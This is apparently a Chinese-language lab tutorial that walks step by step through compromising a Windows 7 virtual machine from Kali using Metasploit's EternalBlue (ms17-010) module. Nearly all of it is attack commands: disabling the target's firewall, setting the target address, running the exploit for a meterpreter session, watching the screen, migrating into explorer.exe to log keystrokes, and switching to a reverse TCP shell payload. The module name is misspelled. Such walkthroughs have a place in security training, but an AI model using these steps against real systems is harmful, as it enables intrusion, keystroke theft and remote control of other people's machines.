仅在两台虚拟机中（kali，win7->靶机），使用MSF工具

1.关闭虚拟机win7系统的防火墙

2.打开kali的终端，安装MSF相关框架：

apt install Metasploit-framework

3.初始化MSF：

msfdb init

4.启动MSF专用数据库：

service postgresql start

5.启动MSF：

msfconsole

6.查找永恒之蓝模块：

search ms17-010

7.选择使用的模块：

use exploit/windows/smb/ms17_010_eternablue

(检查RHOSTS，由于刚选择这个模块，所以他的RHOSTS的值是空的)

8.回到win7系统中，打开命令提示符，键入

ipconfig

查看IP地址（192.168.177.131）

9.给RHOSTS设置参数并检查：

set rhosts 192.168.177.131

(检查RHOSTS的值是否设置成功：show options)

10.RHOSTS参数设置成功后，键入：run开始，成功后显示meterpreter > ，这时候在其后键入screenshare监视win7屏幕

11.回到终端MSF界面，这时界面显示：meterpreter > ，继续键入：ps查看win7后台，记住explorer.exe的PID(1752)接着键入：migrate 1752开始键盘记录【完成后可按Ctrl+c结束记录，结束后会生产一个记录文件的路径，后续可使用终端root权限打开查看】

12.若想进入win7命令行界面，键入：exit退出该模式，此时界面显示：msf6 exploit(windows/smb/ms17_010_eternablue) > ,然后键入:set payload windows/x64/shell/reverse_tcp以修改payload参数，此时键入run，等待片刻即可成功进入win7的shell界面【win7的shell界面可能有乱码，键入chcp 65001即可更改】